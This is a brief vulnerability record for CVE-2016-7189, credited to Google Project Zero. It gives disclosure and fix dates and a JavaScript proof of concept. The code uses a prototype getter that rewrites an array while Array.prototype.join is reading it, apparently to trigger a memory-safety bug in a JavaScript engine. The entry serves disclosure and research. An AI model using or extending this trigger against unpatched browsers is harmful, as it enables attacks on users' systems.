CVE-2016-7189

  • Report: Aug 2016
  • Fix: Oct 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

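// t starts with three integers; extending length leaves indices 3..99 as holes.
var t = new Array(1,2,3);
t.length = 100;

// o defines a getter for index '3'. Once o is t's prototype,
// reading the hole at t[3] invokes this getter.
var o = {};
Object.defineProperty(o, '3', {
  get: function() {
    // Side effect during the read: every slot of t is overwritten
    // with an object while the caller is still iterating over t.
    t[0] = {};
    for (var i = 0; i < 100; i++) {
      t[i] = {a : i};
    }
    return 7;
  }
});

t.__proto__ = o;

// Array.prototype.join walks t; the getter above fires in the middle of the join.
var j = [];
var s = j.join.call(t);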

Reference